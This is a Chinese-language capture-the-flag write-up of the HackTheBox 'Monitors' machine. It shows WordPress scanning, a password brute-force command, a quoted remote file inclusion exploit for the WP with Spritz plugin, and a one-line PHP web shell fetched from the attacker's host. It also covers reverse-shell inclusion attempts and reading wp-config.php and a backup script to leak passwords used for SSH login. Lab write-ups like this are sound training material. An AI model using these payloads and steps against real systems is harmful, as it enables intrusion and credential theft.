monitors.htb

拓扑图

monitors.htb

wpscan扫描

curl monitors.htb > index.html

wpscan –url monitors.htb –enumerate

晚上11:40开始使用wpscan扫描,但是工具未更新

启示,所有的渗透工具都应该及时升级到最新版。不能因为懒惰而不更新。

11点46扫完了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
wpscan --url monitors.htb  --enumerate                 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://monitors.htb/ [10.10.10.238]
[+] Started: Mon Jul 19 23:42:19 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://monitors.htb/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://monitors.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://monitors.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://monitors.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://monitors.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://monitors.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: iconic-one
 | Location: http://monitors.htb/wp-content/themes/iconic-one/                                         
 | Last Updated: 2021-06-15T00:00:00.000Z                                                              
 | Readme: http://monitors.htb/wp-content/themes/iconic-one/readme.txt                                 
 | [!] The version is out of date, the latest version is 2.2                                           
 | Style URL: http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8                     
 | Style Name: Iconic One                                                                              
 | Style URI: https://themonic.com/iconic-one/                                                         
 | Description: Iconic One is a premium quality theme with pixel perfect typography and responsiveness and is built ...                                                                                       
 | Author: Themonic                                                                                    
 | Author URI: https://themonic.com                                                                    
 |                                                                                                     
 | Found By: Css Style In Homepage (Passive Detection)                                                 
 |                                                                                                     
 | Version: 2.1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8, Match: 'Version: 2.1.7'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:18 <=======================> (356 / 356) 100.00% Time: 00:00:18
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:41 <=====================> (2575 / 2575) 100.00% Time: 00:02:41

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:11 <========================> (137 / 137) 100.00% Time: 00:00:11

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:20 <==============================> (71 / 71) 100.00% Time: 00:00:20

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:09 <===================> (100 / 100) 100.00% Time: 00:00:09

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <=========================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://monitors.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jul 19 23:46:28 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 904.034 KB
[+] Data Received: 17.441 MB
[+] Memory used: 279.504 MB
[+] Elapsed time: 00:04:08

登陆框爆破

echo “10.10.10.238 monitors.htb” > /etc/hosts
ping monitors.htb
http://monitors.htb/wp-login.php
wpscan –url http://monitors.htb/wp-login.php –passwords /usr/share/wordlists/rockyou.txt –usernames admin

插件可能有漏洞

wpscan –url monitors.htb –enumerate p
下午五点7分开始扫描,

扫出一个插件

2

远程文件包含

1
2
3
WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion

view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps


1. Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

2. Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

3. Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

远程文件包含漏洞的源码

漏洞原理可以查看:What is Remote File Inclusion (RFI)?

通过这样的url即可查看:view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=wp.spritz.content.filter.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

$content = preg_replace('/<!--spritz-->.*?<!--\/spritz-->/is', '', $content);

$sel=isset($_GET['selector'])?$_GET['selector']:'';
$selector=array_filter(explode(',',$sel));
if(is_array($selector) && sizeof($selector)>0){
	foreach($selector as $val){
		$splter=array_filter(explode('.',$val));
		$ids=array_filter(explode('|',$val));
		if(substr($val, 0, 1)=='|' || substr($val, 0, 1)=='.'){
			
			$tag=(isset($ids[1]) && $ids[1]!='')?$ids[1]:$splter[1];
			$selector=(isset($ids[1]) && $ids[1]!='')?'id':'class';
			$key=$tag;
			$content=preg_replace('/<div[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?div[^>]*>)|<div[^>]*>(?>(?1))*<\/div>)*<\/div>/i', "", $content);
			
			$content=preg_replace('/<article[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?article[^>]*>)|<article[^>]*>(?>(?1))*<\/article>)*<\/article>/i', "", $content);
			$content=preg_replace('/<header[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?header[^>]*>)|<header[^>]*>(?>(?1))*<\/header>)*<\/header>/i', "", $content);
			$content=preg_replace('/<nav[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?nav[^>]*>)|<nav[^>]*>(?>(?1))*<\/nav>)*<\/nav>/i', "", $content);
			$content=preg_replace('/<footer[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?footer[^>]*>)|<footer[^>]*>(?>(?1))*<\/footer>)*<\/footer>/i', "", $content);
			$content=preg_replace('/<p[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?p[^>]*>)|<p[^>]*>(?>(?1))*<\/p>)*<\/p>/i', "", $content);
			/*$content=preg_replace("/<span[^>]*".$tag."[^>]*>([^<]+|<(?!\/?span[^>]*>)|<span[^>]*>(?>(?1))*<\/span>)*<\/span>/i", "", $content);
			$content=preg_replace("/<table[^>]*".$tag."[^>]*>([^<]+|<(?!\/?table[^>]*>)|<table[^>]*>(?>(?1))*<\/table>)*<\/table>/i", "", $content);
			$content=preg_replace("/<article[^>]*".$tag."[^>]*>([^<]+|<(?!\/?article[^>]*>)|<article[^>]*>(?>(?1))*<\/article>)*<\/article>/i", "", $content);
			$content=preg_replace("/<nav[^>]*".$tag."[^>]*>([^<]+|<(?!\/?nav[^>]*>)|<nav[^>]*>(?>(?1))*<\/nav>)*<\/nav>/i", "", $content);
			$content=preg_replace("/<aside[^>]*".$tag."[^>]*>([^<]+|<(?!\/?aside[^>]*>)|<aside[^>]*>(?>(?1))*<\/aside>)*<\/aside>/i", "", $content);
			$content=preg_replace("/<header[^>]*".$tag."[^>]*>([^<]+|<(?!\/?header[^>]*>)|<header[^>]*>(?>(?1))*<\/header>)*<\/header>/i", "", $content);
			$content=preg_replace("/<footer[^>]*".$tag."[^>]*>([^<]+|<(?!\/?footer[^>]*>)|<footer[^>]*>(?>(?1))*<\/footer>)*<\/footer>/i", "", $content);*/
		}else{
			if(strpos($val,'.')==true){
				$content=preg_replace("/<".$splter[0]."[^>]*".$splter[1]."[^>]*>([^<]+|<(?!\/?".$splter[0]."[^>]*>)|<".$splter[0]."[^>]*>(?>(?1))*<\/".$splter[0].">)*<\/".$splter[0].">/i", "", $content);
			}else if(strpos($val,'|')==true){
				$content=preg_replace("/<".$ids[0]."[^>]*".$ids[1]."[^>]*>([^<]+|<(?!\/?".$ids[0]."[^>]*>)|<".$ids[0]."[^>]*>(?>(?1))*<\/".$ids[0].">)*<\/".$ids[0].">/i", "", $content);
			}else{
				$tag=isset($ids[0])?$ids[0]:$splter[0];
				$content=preg_replace("/<".$tag."\b[^>]*>(?>(?:[^<]++|<(?!\/?".$tag."\b[^>]*>))+|(?R))*<\/".$tag.">/is", "", $content);	
			}
		}
	}
}

echo $content;
}
?>

远程文件包含尝试getshell

http://10.10.14.17:8083/whale3070.php

1
<?php system($_GET["cmd"]); ?>

使用url
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.17:8083/whale3070.php?cmd=whoami

发现php没有解析

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.17:8000/php-reverse-shell.php

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.17:8000/p.txt

echo cacti-admin.monitors.htb

view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php

ssh登陆获得普通用户权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

ssh marcus@10.10.10.238
VerticalEdge2020

nc -lnvp 5555 < linux-exploit-suggester.sh    
nc 10.10.14.17 5555 > linux-exploit-suggester.sh

考点

docker逃逸
capability cap_sys_module